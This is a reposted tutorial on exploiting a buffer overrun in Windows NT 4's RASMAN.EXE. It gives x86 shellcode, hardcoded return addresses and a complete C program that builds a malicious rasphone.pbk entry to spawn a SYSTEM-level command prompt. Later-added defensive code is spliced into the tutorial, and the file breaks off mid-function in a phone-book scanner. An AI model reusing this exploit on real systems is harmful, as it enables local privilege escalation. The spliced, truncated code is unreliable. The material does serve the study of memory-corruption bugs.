Monday, July 25, 2005


NT Buffer Overrun

Technology Updates
Exploiting Windows NT 4 Buffer Overruns
A Case Study:
RASMAN.EXE

--------------------------------------------------------------------------------

Introduction
This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do. With these covered we'll look into the buffer overrun found in RASMAN.EXE. This document may be freely copied and distributed only in its entirety and if credit is given.
Cheers, David Litchfield


What is a buffer overrun?
A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source:


#include <stdio.h>

int main(void)
{
    char name[31];                       /* fixed-size buffer for the name */

    printf("Please type your name: ");
    gets(name);                          /* no length check: this is the overrun */
    printf("Hello, %s", name);
    return 0;
}


When this source is compiled and turned into a program and the program is run it will assign a block of memory 32 bytes long to hold the name string. Under normal operation someone would type in their name, for instance "David", and the program would then print to the screen "Hello, David". David is 5 letters long, with each letter taking up a single byte. The end of a string, though, is denoted by a thing called a null terminator - which is basically a byte with a value of zero. So we need to add a null terminator to the end of the string making a total length of 6 bytes. It is clear that 6 bytes will fit into the 32 bytes set aside to store the name string. If however, instead of entering "David", we entered

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

that is 40 capital As, when the program reads in our input and places it in our buffer it overflows. 40 will definitely not fit into 32.

It so happens that if we enter 40 As we completely overwrite the contents of a special CPU register known as the Instruction Pointer or EIP - the E stands for Extended by the way. A quick explanation of a register - a computer's processor has small memory storage units called registers. Access to the values held in these registers is very quick. These registers have special names and can hold memory addresses and variables. The EIP is one of these registers and holds the memory address of the next instruction to execute. What do I mean by instruction? A program contains a list of instructions for the processor to carry out in order for the program to do its job, much like a recipe contains instructions for a cook to carry out in order to make a cake. These instructions are known as operation codes or opcodes for short. So when a program is running and the processor is executing one of the program's instructions the EIP holds the memory address where the next instruction to be executed can be found. After the current instruction has been executed the processor goes to that memory address and pulls in the instruction found there, then increments the EIP and then executes that instruction. This process of pulling the opcode from the memory address pointed to by the EIP, then incrementing the EIP, then executing that instruction continues until the program exits.

Going back to our code, the fact that we have overwritten the EIP means that we can effectively tell the CPU to go to a memory address of our choosing and pull down the instruction found there and execute that. Because we are filling the buffer with As we overwrite the EIP with 0x41414141 - 41 is the hex value for a capital A. The processor then goes to address 0x41414141 and tries to read in the instruction found at that address. If there's no instruction there we get a thing known as an Access Violation. Most people will know of this as a message popping up saying something like "The Instruction at '0x41414141' referenced memory at '0x41414141'. The memory could not be read." If we had filled our buffer with Bs we would overwrite the EIP with 0x42424242, essentially telling the processor to go to that memory address to get the next instruction, and more than likely we'd get the same Access Violation.
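As an added illustration (not code from the original paper), here is the same name-reading step written with a bounded read in place of gets ( ), plus a helper that computes how far a given input would spill past the 32-byte buffer. The function names and the rejection policy (refuse an overlong line rather than truncate it) are my own choices.

```c
#include <stdio.h>
#include <string.h>

#define NAME_CAP 32   /* the 32-byte buffer of the example above */

/* Forty capital As, built from four ten-character pieces so the count is exact. */
#define FORTY_AS "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"

enum { NAME_OK = 0, NAME_TOO_LONG = 1, NAME_EOF = 2 };

/* How many bytes a gets()-style copy of `line` (plus its null terminator)
   would land past the end of a `cap`-byte buffer; 0 means it fits. */
size_t bytes_past_buffer(const char *line, size_t cap)
{
    size_t needed = strlen(line) + 1;
    return needed > cap ? needed - cap : 0;
}

/* Bounded replacement for gets(name): reads one line from `in` into a buffer
   of `cap` bytes. A line that does not fit is rejected rather than silently
   truncated, and the excess is drained so the next read starts on a new line. */
int read_name(FILE *in, char *name, size_t cap)
{
    if (cap == 0)
        return NAME_EOF;
    if (fgets(name, (int)cap, in) == NULL) {   /* fgets never writes past cap-1 chars */
        name[0] = '\0';
        return NAME_EOF;
    }
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '\n') {
        name[len - 1] = '\0';                  /* whole line fitted */
        return NAME_OK;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return NAME_OK;                        /* buffer filled exactly; line ends here */
    while (c != EOF && c != '\n')              /* too long: drain the rest of the line */
        c = fgetc(in);
    name[0] = '\0';
    return NAME_TOO_LONG;
}

/* Test helper: runs read_name() over a string as if it had been typed. */
int read_name_from_string(const char *input, char *name, size_t cap)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NAME_EOF;
    fputs(input, f);
    rewind(f);
    int rc = read_name(f, name, cap);
    fclose(f);
    return rc;
}

int main(void)
{
    char name[NAME_CAP];
    printf("Please type your name: ");
    if (read_name(stdin, name, sizeof name) == NAME_OK)
        printf("Hello, %s\n", name);
    else
        printf("Name rejected: longer than %d characters\n", NAME_CAP - 1);
    return 0;
}
```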


Exploiting a buffer overrun.
As you'll see later on, being able to overwrite the EIP is vital to exploiting a buffer overrun. When you exploit a buffer overrun you basically get the processor to execute instructions or code of your choosing, getting the program to do something it would not normally do. You do this by pointing the EIP back into the buffer, which you load with your own opcodes, which are then executed. This raises the question, "Why would someone want to do this?"
Windows NT, like UNIX systems, requires a user to log into the system. Some users are very powerful, such as the Administrator, and others are just your average normal user that isn't as powerful. If a normal user wanted to become equivalent to the Administrator, and thus just as powerful with almost full control of the system, they could exploit a buffer overrun to attain this. The problem is that the buffer overrun needs to be in a process that has enough power and privileges to be able to make them an Administrator, so there is no point in overrunning a buffer in a process that they, the user themselves, have started. They need to overrun a buffer in a process started by the system and then get the process to execute their own arbitrary code. The system account is very powerful, and if you can get a system process to do something, such as open a Command Prompt, then it will run with system privileges. In Windows NT, if a process starts a new child process then the child process normally inherits the access token of the parent process - normally, because some processes can be started using the Win32 CreateProcessAsUser ( ) function, which starts the new process under the security context of another user, so the new process has a different access token from the parent process. An Access Token is like a set of keys - it denotes a user's rights and privileges, which determine what they can and cannot do to the machine. An example of this is screen savers. The winlogon.exe system process is responsible for starting a user's screen saver. As opposed to running the screen saver in the security context of the system, winlogon uses CreateProcessAsUser ( ) to start the screen saver in the security context of the currently logged on user. I digress - back to buffer overruns. In this case study we'll look at the buffer overrun in RASMAN.EXE, a system process, and get it to open a Windows NT Command Prompt.
This Command Prompt will have the access token of the system account, and so will any other processes started from it. But first a bit more on an NT process' virtual memory layout.

A process embodies many things, amongst others a running program, one or more threads of execution, the process' virtual address space and the dynamic link libraries (DLLs) the program uses. The process has 4 GB of virtual address space to use. Half of this, from address 0x00000000 to 0x7FFFFFFF, is private address space where the program, its DLLs and stack (or stacks in the case of a multithreaded program) are found; the other half, address 0x80000000 to 0xFFFFFFFF, is the system address space where such things as NTOSKRNL.EXE and the HAL are loaded. As a side note, this default behaviour can be changed as of service pack three - you can specify a switch in the boot.ini, /3GB, that will assign 3 GB as private address space and 1 GB as system address space. This is to boost the performance of programs, such as databases, that require large amounts of memory.

When a program is run NT creates a new process. It loads the program's instructions and the DLLs the program uses into the private address space and marks the pages it uses as read-only. Any attempt to modify pages in memory marked as read only will cause an Access Violation. The first thread is started and a stack is initialised.


The Stack
What's the simplest way to describe a stack? Try this: Imagine a carpenter. He has tools, materials and instructions. To be able to make something, though, he needs a workbench. The stack is similar to this workbench. It is a place where he can use his tools to shape and model his raw materials. He can put something down on the workbench, say waiting for the glue to dry on two bits of wood, and do something else. When that task is complete he can come back to his two bits of wood and continue with that. The workbench is where most of the work is done.
So too, in a process, the stack is where most things are done. It is a writeable area of memory that dynamically shrinks and grows as needed or as determined by the program's execution. When a programmatic task is started it'll place data on the stack, whether these be strings, memory addresses, integers or whatever, then manipulate them, and when the task has completed it will return the stack to its original state so that the next task can use it if it needs to. Working in this way the process interacts with the stack using a method known as Last In, First Out or LIFO.

There are two registers that are crucial to the stack's functionality - they are used by the program to keep track of where data can be found in memory. These two registers are the ESP and the EBP.

The ESP, or the Stack Pointer, points to the top of the stack. The ESP contains the memory address where the top of the stack can be found. The ESP can be changed in a number of ways, both indirectly and directly. When something is PUSHed onto the stack the ESP increases accordingly. When something is POPed off of the stack the ESP shrinks. The PUSH and POP operations modify the ESP indirectly. But then you can manipulate the ESP directly, with say an instruction of "SUB esp,04h", which pushes the stack out by four bytes or one word. For those that haven't yet been numbed into boredom, something may just have irked: how is it that you SUBtract 4 from the ESP and yet the ESP is pushed out? Well this is because the stack works backwards. The bottom of the stack uses a memory address higher than the top of the stack:



----------------0x12121212 Top of the stack
...
...
----------------0x121212FF Bottom of the stack


Here we have definitive proof that the fathers of modern computing were indeed closet sadists or had shares in makers of paracetamol - occasionally they throw in gems like this to make that headache that bit more acute. When we say the stack increases in size the address held in the ESP decreases. Conversely, when the stack size decreases the address held in the ESP increases. Reaching for the Aspirin yet?

Our second stack related register is known as the EBP or the Base Pointer. The EBP holds the memory address of the bottom of the stack - more accurately it points to a base point in the stack that we can use as a reference point within a given programmatic task. The EBP must have meaning to a given task, and to facilitate this, before the task's real business is started, a setup procedure known as the "procedure prologue" is first completed. What this does is, firstly, save the current EBP by PUSHing it onto the stack. This is so that the processor and program will know where to pick up from after the currently executing task has completed. The ESP is then copied into the EBP, thus creating a new Base Pointer that the currently executing task can use as a reference point irrespective of how the ESP changes during the task's execution. Continuing with this, let's say an 11 character string was placed onto the stack - our EBP remains the same but the ESP has been pushed out by 12 bytes. Then say an address was PUSHed onto the stack - our ESP is pushed out by another 4 bytes, though our EBP still remains the same. Now let's say we needed to reference the 11 byte string - we can do this by using our EBP: we know the first byte of our string (the pointer to the string) is twelve bytes away from the EBP, so we can reference this string's pointer by saying "the address found at EBP minus 12". (Remember the stack goes from a higher address to a lower address.)


RASMAN and buffer overruns.
Finding the buffer overrun
The first thing you need to do to be able to exploit a buffer overrun is to a) know about an existing one or b) find your own one. In the case of RASMAN, the overrun was found by looking at the RAS functions and the structures they use. Notice that some of the functions, such as RasGetDialParams ( ), fill structures that contain character arrays, much like the char name[31] array in the C code above. By playing around with the rasphone.pbk file, the RAS Phone Book, where dialing details, such as the phone number to be dialed, are stored, you can root out these overruns. Make a phone book entry called "Internet", which dials into your ISP, dial it, and download your mail. This is important as this adds to the Registry an entry for the domain name of your mail server as an Autodial location. That is, if you try to contact your mail server from that point on without being dialed into the Internet, the Connection manager will kick in and automatically dial for you. RASMAN is the process that handles this functionality. Once you have done this, change the telephone number to a long string of As and then attempt to connect to your mail server, say, by opening Outlook Express. This causes RASMAN to read in from rasphone.pbk the telephone number to dial to be able to get to your mail server. But instead of the real telephone number the long string of As is read instead and fills a character array in the RAS_DIAL_PARAMS structure, which overflows, causing an Access Violation - at address 0x41414141. We've found a buffer overrun and, more exciting, overwritten the EIP.

Finding where the EIP is overwritten
By experimenting with the length of the "telephone number" we find that we overwrite the EIP with bytes 296,297,298 and 299 of our string. (You'll find that, if you are actually following this, you'll need to reboot the system after the overflow to be able to restart the service, and you'll have to end tasks such as AthenaWindow and msmin.exe.) Once we have found where we overwrite the EIP it is time to get out the debugger - the debugging capabilities of Visual C++ are very good. Attach to the RASMAN process and then get it to dial - or attempt to at least. Wait for the access violation.

Analyze what's going on.
Once the access violation has occurred we need to look at the stack and the state of the CPU's registers. From this we can see that we also overwrite the EBP, which will come in handy later on, and that the address of the first A of our "telephone number" is 0x015DF105. By triggering the access violation in RASMAN a number of times we find that the first A is always written to this address. This is the address we're going to set the EIP to so that the processor will look at that address for the next instruction to execute. We'll stuff the "telephone number" full of our own opcodes that will get RASMAN to do what we want it to do - our arbitrary code. We then need to ask, "What do we want it to do?".

Where do you want to go today? - What do you want to achieve?
The best thing to do, as we need to be at the console to get this to work, is get RASMAN to open up a Command Prompt. From here we can run any program we want with system privileges. The easiest way to get a program to run a Command Prompt, or any other program for that matter, is to use the system ( ) function. When the system ( ) function is called it looks at the value of the ComSpec environment variable, normally "c:\winnt\system32\cmd.exe" on Windows NT, and executes that with a "/C" switch. The function passes cmd.exe a command to run and the "/C" switch tells cmd.exe to exit after the command has finished executing. If we pass "cmd.exe" as the command - system("cmd.exe"); - this will cause the system function to open up cmd.exe with the "/C" switch and execute cmd.exe - so we are running two instances of the command interpreter - however the second one won't exit until we tell it to (and nor will the first until the second one has exited).
Rather than placing the opcodes that actually form the system ( ) function in our exploit string it would be easier to simply call it. When you call a function you tell the program to go to a certain DLL that contains the code for the function you are calling. The use of DLLs means that programs can be smaller in size - rather than each program containing the necessary code for each function used, they can call a shared DLL that does contain the code. DLLs are said to export functions - that is, the DLL provides an address where a function can be found. The DLL also has a base address so the system knows where to find that DLL. When a DLL is loaded into a process' address space it will always be found at that base address and the functions it exports can then be found at an entry point within the base. The system ( ) function is exported by msvcrt.dll (the Microsoft Visual C++ Runtime library), which has a base address of 0x78000000, and the system ( ) entry point can be found at 000208C3 (in version 5.00.7303 of msvcrt.dll anyway), meaning that the address of the system ( ) function is 0x780208C3. Hopefully msvcrt.dll will already be loaded into RASMAN's address space - if it isn't we'll need to use LoadLibrary ( ) and GetProcAddress ( ). Fortunately RASMAN does use msvcrt.dll and so it is already in the process address space. This makes the job of exploiting the buffer overrun very easy indeed - we'll simply build a stack with our string of the command to run (cmd.exe) and call it. What makes it even better is that the address 0x780208C3 has no nulls (00) in it. Nulls can really complicate issues.

To find out what the stack needs to look like when a normal program calls system("cmd.exe"); we need to write one that does and debug it. We'll need to get our arbitrary code to build a duplicate image of the stack as it appears in our program just before system ( ) is called. Below is the source of our program. Compile and link it with kernel32.lib, then run and debug it.



#include <windows.h>
#include <stdio.h>

typedef void (*MYPROC)(LPTSTR);

int main(void)
{
    HINSTANCE LibHandle;
    MYPROC ProcAdd;

    char dllbuf[11] = "msvcrt.dll";
    char sysbuf[7]  = "system";
    char cmdbuf[8]  = "cmd.exe";

    /* Map the C runtime and look up system ( ) by name */
    LibHandle = LoadLibrary(dllbuf);
    if (LibHandle == NULL)
        return 1;

    ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf);
    if (ProcAdd == NULL)
        return 1;

    /* Break here in the debugger and examine the stack before the call */
    (ProcAdd) (cmdbuf);

    return 0;
}




On debugging and examining the stack prior to calling system ( ) [(ProcAdd)(cmdbuf); in the above code] we see that, starting from the top of the stack, we find the address of the "c" of cmd.exe, then the address where the system ( ) function can be found, then the null terminated cmd.exe string and a few other things that are not too important. So to emulate this we need the null terminated "cmd.exe" string in the stack, then the address of the system function and then the address which points to our "cmd.exe" string. Below is a picture of what we need the stack to look like before calling system ( ).



-------------------- ESP (Top of the Stack)
XX
XX
XX
XX      (address of the "c" of "cmd.exe")
--------------------
C3
08
02
78      (0x780208C3, the address of system ( ))
--------------------
63 c
6D m
64 d
2E .
65 e
78 x
65 e
00      (null terminated "cmd.exe")
-------------------- EBP (Bottom of the stack)


where the top 4 XXs are the address of "c". We don't need to hardcode this address into our exploit string because we can use the EBP as a reference - remember it is the base pointer. Later on you'll see that we load the address where the first byte of our cmd.exe string can be found into a register using the EBP as a reference point.


Writing the Assembly.
This is what we need the stack to look like when we call system ( ). How do we get it there? We have to build it ourselves with our opcodes - we can't just put it in our exploit string because as you can see there are nulls in it and we can't have nulls. Because we have to build it this is where knowing at least a little assembly language comes in handy. The first thing we need to do is set the ESP to an address we can use for our stack. (Remember the ESP points to the top of the stack.) To do this we use:
mov esp, ebp

This moves the EBP into the ESP - remember we overwrite the EBP as well as the EIP, which is really handy. We'll overwrite the EBP with an address we know we can write to - we will use 0x015DF124. Consequently, after we move the EBP into the ESP, the top of the stack will be found at 0x015DF124.

We then want to push EBP onto the stack. This is our return address.

push ebp

This has the effect of pushing the ESP down 4 bytes and so ESP is now 0x015DF120. After this we then want to move the ESP into the EBP:

mov ebp,esp

This completes our own procedure prologue. With this done we can go about building the stack the way we want it to look.

The next thing we need to do is get some nulls onto the stack. We need some nulls because we need to have our cmd.exe string terminated with a null. The cmd.exe string isn't there yet, but it will be; we have to do things in reverse order. Before we can push some nulls onto the stack we need to make some. We do this by xoring a register with itself - we'll use the EDI register.

xor edi,edi

This will set the EDI to 00000000 and then we push it onto the stack using

push edi

This also has the added effect of pushing out our ESP to 0x015DF11C. But "cmd.exe" is 7 bytes long and we only have room for 4 bytes so far, and don't forget we need a null tacked on the end of our string, so we need to push the ESP out another 4 bytes to give us a total of 8 bytes of space between the ESP and the EBP. We could push the edi again, but for variety we'll just sub the ESP by 4.

sub esp,04h

Our ESP is now 0x015DF118 and our EBP is 0x015DF120. Our next job is to get cmd.exe written to the stack. To do this we'll use the EBP as a reference point and move 63, the hex value for a lowercase "c", into the address EBP minus 8.

mov byte ptr [ebp-08h],63h

We do the same for the "m", the "d", the ".", the first "e", the "x" and the final "e".

mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h

Our stack now looks like this:



----------------------------------------------------- ESP
63 c
6D m
64 d
2E .
65 e
78 x
65 e
00
----------------------------------------------------- EBP


All that we need to do now is put the address of system( ) onto the stack and the pointer to our cmd.exe string on top of that - once that is done we'll call the system ( ) function.

We know that the system( ) function is exported at address 0x780208C3 so we'll move this into a register and then push it onto the stack:

mov eax, 0x780208C3
push eax

We then want to put the address of the "c" of our "cmd.exe" string onto the stack. We know that the "c" can be found eight bytes away from our EBP so we'll load the address 8 bytes less than the EBP into a register:

lea eax,[ebp-08h]

The EAX register now holds the address where our cmd.exe string begins. We then want to push this onto the stack:

push eax

With this done our stack is built and we are ready to call system ( ), but we don't call it directly - again we use the indirection of our EBP as a reference point and call the address found at EBP minus 12 (or 0C in hex):

call dword ptr [ebp-0ch]

Here is all our code strung together.



mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
mov eax, 0x780208C3
push eax
lea eax,[ebp-08h]
push eax
call dword ptr [ebp-0ch]
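To check the arithmetic of that listing, here is an added C model, written for this edit and not part of the original paper, that replays each instruction against a constructed 512-byte slice of memory, starting from the EBP value the overrun supplies (0x015DF124, as above). EIP is not modelled, so the CALL pushes a placeholder return address; the point is to show what system ( ) would find on its stack on entry.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* A constructed 512-byte slice of the process' stack region covering the
   addresses the page quotes (0x015DF1xx); not a real memory dump. */
#define MEM_BASE        0x015DF000u
#define MEM_SIZE        0x200u
#define RET_PLACEHOLDER 0xFFFFFFFFu   /* stands in for the address after the CALL */

typedef struct {
    uint8_t  mem[MEM_SIZE];
    uint32_t esp, ebp, eax, edi;
    uint32_t call_target;   /* where the final CALL transfers control */
    int      faulted;       /* set if any access left the modelled slice */
    uint8_t  scratch;
} Cpu;

static uint8_t *at(Cpu *c, uint32_t addr)
{
    if (addr < MEM_BASE || addr >= MEM_BASE + MEM_SIZE) {
        c->faulted = 1;     /* the real CPU would raise an access violation */
        return &c->scratch;
    }
    return &c->mem[addr - MEM_BASE];
}

static void write8(Cpu *c, uint32_t addr, uint8_t v) { *at(c, addr) = v; }

static void write32(Cpu *c, uint32_t addr, uint32_t v)   /* little-endian */
{
    for (int i = 0; i < 4; i++)
        write8(c, addr + i, (uint8_t)(v >> (8 * i)));
}

uint32_t read32(Cpu *c, uint32_t addr)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)*at(c, addr + i) << (8 * i);
    return v;
}

static void push32(Cpu *c, uint32_t v) { c->esp -= 4; write32(c, c->esp, v); }

/* Replays the page's sequence, one statement per instruction, starting from
   the state the overrun leaves behind (EBP = 0x015DF124). */
void build_frame(Cpu *c)
{
    static const uint8_t cmd[7] = { 0x63, 0x6D, 0x64, 0x2E, 0x65, 0x78, 0x65 }; /* "cmd.exe" */
    memset(c, 0, sizeof *c);
    c->ebp = 0x015DF124u;
    c->esp = c->ebp;                 /* mov esp,ebp         esp = 0x015DF124 */
    push32(c, c->ebp);               /* push ebp            esp = 0x015DF120 */
    c->ebp = c->esp;                 /* mov ebp,esp         ebp = 0x015DF120 */
    c->edi = 0;                      /* xor edi,edi */
    push32(c, c->edi);               /* push edi            four nulls at 0x015DF11C */
    c->esp -= 4;                     /* sub esp,04h         esp = 0x015DF118 */
    for (int i = 0; i < 7; i++)      /* mov byte ptr [ebp-08h+i],<byte> */
        write8(c, c->ebp - 8 + i, cmd[i]);
    c->eax = 0x780208C3u;            /* mov eax,0x780208C3  system() on the page's msvcrt.dll */
    push32(c, c->eax);               /* push eax            lands at [ebp-0Ch] */
    c->eax = c->ebp - 8;             /* lea eax,[ebp-08h]   address of the "c" */
    push32(c, c->eax);               /* push eax            lands at [ebp-10h] */
    c->call_target = read32(c, c->ebp - 0x0C);   /* call dword ptr [ebp-0Ch]: */
    push32(c, RET_PLACEHOLDER);      /* ...CALL pushes the return address and jumps */
}

/* What a cdecl callee such as system() sees on entry: [esp] is the return
   address and [esp+4] is its first argument. */
uint32_t first_arg(Cpu *c) { return read32(c, c->esp + 4); }

/* Copies the null-terminated string at addr into out (at most n-1 bytes). */
const char *string_at(Cpu *c, uint32_t addr, char *out, size_t n)
{
    size_t i = 0;
    for (; i + 1 < n; i++) {
        uint8_t b = *at(c, addr + i);
        if (b == 0) break;
        out[i] = (char)b;
    }
    out[i] = '\0';
    return out;
}

int main(void)
{
    Cpu c; char s[16];
    build_frame(&c);
    printf("esp=%08X ebp=%08X call->%08X arg=%08X \"%s\" faulted=%d\n",
           c.esp, c.ebp, c.call_target, first_arg(&c),
           string_at(&c, first_arg(&c), s, sizeof s), c.faulted);
    return 0;
}
```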


The next thing to do is test this assembly to see if it works, so we need to write a program that uses the __asm ( ) function. The __asm ( ) function takes Assembly language and incorporates it into a C program. As we are calling system ( ), which is exported by msvcrt.dll, we'll need to load that - we use the LoadLibrary ( ) function to do this - otherwise when run our code would fail:



#include <windows.h>
#include <stdio.h>

int main(void)
{
    /* system ( ) lives in msvcrt.dll, so make sure it is mapped first */
    LoadLibrary("msvcrt.dll");

    __asm {
        mov esp,ebp
        push ebp
        mov ebp,esp
        xor edi,edi
        push edi
        sub esp,04h
        mov byte ptr [ebp-08h],63h
        mov byte ptr [ebp-07h],6Dh
        mov byte ptr [ebp-06h],64h
        mov byte ptr [ebp-05h],2Eh
        mov byte ptr [ebp-04h],65h
        mov byte ptr [ebp-03h],78h
        mov byte ptr [ebp-02h],65h
        mov eax, 0x780208C3
        push eax
        lea eax,[ebp-08h]
        push eax
        call dword ptr [ebp-0ch]
    }

    /* The frame is not restored after the call, so exiting faults (see below) */
    return 0;
}


Compile and link with kernel32.lib. When run this should start a new instance of the Command Interpreter, cmd.exe. There will be an access violation when you exit that instance, though - we've messed around with the stack and haven't cleaned up after ourselves.

That's it then - that's our arbitrary code, and all we need to do now is put this into the rasphone.pbk file as our telephone number. Before we can do that, though, we need to get the opcodes for the above assembly.

This is relatively easy - just debug the program you've just compiled and get the opcodes from there. You should get "8B E5" for "mov esp,ebp" and "55" for "push ebp", etc. Once we have all the opcodes we need to put these in our "telephone number". But we can't type the opcodes very easily in Notepad. The easiest thing to do is write another program that creates a rasphone.pbk file with the telephone number loaded with our arbitrary code. Below is an example of such a program with comments:



/* This program produces a rasphone.pbk file that will cause and exploit a buffer overrun in
   RASMAN.EXE - it will drop the user into a Command Prompt started by the system.
   It operates by re-writing the EIP and pointing it back into our exploit string which calls
   the system() function exported at address 0x780208C3 by msvcrt.dll (ver 5.00.7303) on
   NT Server 4 (SP3 & 4). Look at the version of msvcrt.dll and change buffer[78] to buffer[81]
   in this code to suit your version. msvcrt.dll is already loaded in memory - it is used by
   RASMAN.exe. Developed by David Litchfield (mnemonix@globalnet.co.uk ) */

#include <stdio.h>
#include <stdlib.h>

int main (int argc, char *argv[])
{
    FILE *fd;
    int count = 0;
    char buffer[1024];

    /* Make room for our stack so we are not overwriting anything we haven't
       already overwritten. Fill this space with nops */
    while (count < 37)
    {
        buffer[count] = 0x90;
        count++;
    }

    /* Our code starts at buffer[37] - we point our EIP to here @ address 0x015DF126 */
    /* We build our own little stack here */
    /* mov esp,ebp */
    buffer[37] = 0x8B;
    buffer[38] = 0xE5;

    /* push ebp */
    buffer[39] = 0x55;

    /* mov ebp,esp */
    buffer[40] = 0x8B;
    buffer[41] = 0xEC;
    /* This completes our negotiation */

    /* We need some nulls */
    /* xor edi,edi */
    buffer[42] = 0x33;
    buffer[43] = 0xFF;

    /* Now we begin placing stuff on our stack */
    /* Ignore this NOP */
    buffer[44] = 0x90;

    /* push edi */
    buffer[45] = 0x57;

    /* sub esp,4 */
    buffer[46] = 0x83;
    buffer[47] = 0xEC;
    buffer[48] = 0x04;

    /* When the system() function is called you ask it to start a program or command,
       eg system("dir c:\\"); would give you a directory listing of the c drive.
       The system () function spawns whatever is defined as the COMSPEC environment
       variable - usually "c:\winnt\system32\cmd.exe" in NT with a "/c" parameter - in
       other words after running the command the cmd.exe process will exit. However, running
       system ("cmd.exe") will cause the cmd.exe launched by the system function to spawn
       another command prompt - one which won't go away on us. This is what we're going to do here */

    /* write c of cmd.exe to (EBP - 8) which happens to be the ESP */
    /* mov byte ptr [ebp-08h],63h */
    buffer[49] = 0xC6;
    buffer[50] = 0x45;
    buffer[51] = 0xF8;
    buffer[52] = 0x63;

    /* write the m to (EBP-7) */
    /* mov byte ptr [ebp-07h],6Dh */
    buffer[53] = 0xC6;
    buffer[54] = 0x45;
    buffer[55] = 0xF9;
    buffer[56] = 0x6D;

    /* write the d to (EBP-6) */
    /* mov byte ptr [ebp-06h],64h */
    buffer[57] = 0xC6;
    buffer[58] = 0x45;
    buffer[59] = 0xFA;
    buffer[60] = 0x64;

    /* write the . to (EBP-5) */
    /* mov byte ptr [ebp-05h],2Eh */
    buffer[61] = 0xC6;
    buffer[62] = 0x45;
    buffer[63] = 0xFB;
    buffer[64] = 0x2E;

    /* write the first e to (EBP-4) */
    /* mov byte ptr [ebp-04h],65h */
    buffer[65] = 0xC6;
    buffer[66] = 0x45;
    buffer[67] = 0xFC;
    buffer[68] = 0x65;

    /* write the x to (EBP-3) */
    /* mov byte ptr [ebp-03h],78h */
    buffer[69] = 0xC6;
    buffer[70] = 0x45;
    buffer[71] = 0xFD;
    buffer[72] = 0x78;

    /* write the second e to (EBP-2) */
    /* mov byte ptr [ebp-02h],65h */
    buffer[73] = 0xC6;
    buffer[74] = 0x45;
    buffer[75] = 0xFE;
    buffer[76] = 0x65;

    /* If the version of msvcrt.dll is 5.00.7303 system is exported at 0x780208C3.
       Use QuickView to get the entry point for system() if you have a different
       version of msvcrt.dll and change these bytes accordingly */
    /* mov eax, 0x780208C3 */
    buffer[77] = 0xB8;
    buffer[78] = 0xC3;
    buffer[79] = 0x08;
    buffer[80] = 0x02;
    buffer[81] = 0x78;

    /* Push this onto the stack */
    /* push eax */
    buffer[82] = 0x50;

    /* now we load the address of our pointer to the cmd.exe string into EAX */
    /* lea eax,[ebp-08h] */
    buffer[83] = 0x8D;
    buffer[84] = 0x45;
    buffer[85] = 0xF8;

    /* and then push it onto the stack */
    /* push eax */
    buffer[86] = 0x50;

    /* now we call our system () function - all going well a command prompt will
       be started, the parent process being rasman.exe */
    /* call dword ptr [ebp-0Ch] */
    buffer[87] = 0xFF;
    buffer[88] = 0x55;
    buffer[89] = 0xF4;

    /* fill to our EBP with nops */
    count = 90;
    while (count < 291)
    {
        buffer[count] = 0x90;
        count++;
    }

    /* Re-write EBP */
    buffer[291] = 0x24;
    buffer[292] = 0xF1;
    buffer[293] = 0x5D;
    buffer[294] = 0x01;

    /* Re-write EIP */
    buffer[295] = 0x26;
    buffer[296] = 0xF1;
    buffer[297] = 0x5D;
    buffer[298] = 0x01;
    buffer[299] = 0x00;
    buffer[300] = 0x00;

    /* Print on the screen our exploit string */
    printf("%s", buffer);

    /* Open and create a file called rasphone.pbk */
    fd = fopen("rasphone.pbk", "w");

    if (fd == NULL)
    {
        printf("Operation failed\n");
        return 0;
    }
    else
    {
        fprintf(fd, "[Internet]\n");
        fprintf(fd, "Phone Number=");
        fprintf(fd, "%s", buffer);
        fprintf(fd, "\n");
        fclose(fd);
    }
    return 0;
}


When compiled and run this program will create a rasphone.pbk file with one entry called Internet and a phone number loaded with our arbitrary code. When RASMAN.EXE opens this file it uses RasGetDialParams ( ) to get the relevant information and assigns it to a RAS_DIAL_PARAMS structure, which contains the character arrays. As you'll have guessed, we're overflowing the one that holds the telephone number.
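Given the file layout just described, here is an added defensive check (written for this edit, not from the original paper) that scans rasphone.pbk-style text for a Phone Number value that could not be a genuine dial string: one longer than a sane maximum, or one containing bytes outside the dial alphabet, which is what a buffer full of opcodes or As looks like. The 64-byte threshold and the dial alphabet are assumptions, and the sample entries are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Threshold is an assumption for this example: real dial strings are a few
   dozen characters, while the overrun above needs 296+ bytes to reach EIP. */
#define MAX_SANE_PHONE_LEN 64
#define PHONE_KEY "Phone Number="

typedef struct {
    char   section[64];   /* the [entry] the value belongs to */
    size_t length;        /* length of the Phone Number value */
    int    non_dialable;  /* 1 if it contains bytes outside the dial alphabet */
} Finding;

/* Characters a genuine dial string may contain (digits plus common modem
   dial modifiers). Anything else, opcode bytes included, is flagged. */
static int dialable(unsigned char ch)
{
    return isdigit(ch) || (ch != '\0' && strchr("+-()*#,; ", ch) != NULL);
}

/* Scans INI-style phone-book text and records each Phone Number value that is
   overlong or non-dialable. Returns the number of findings (at most max). */
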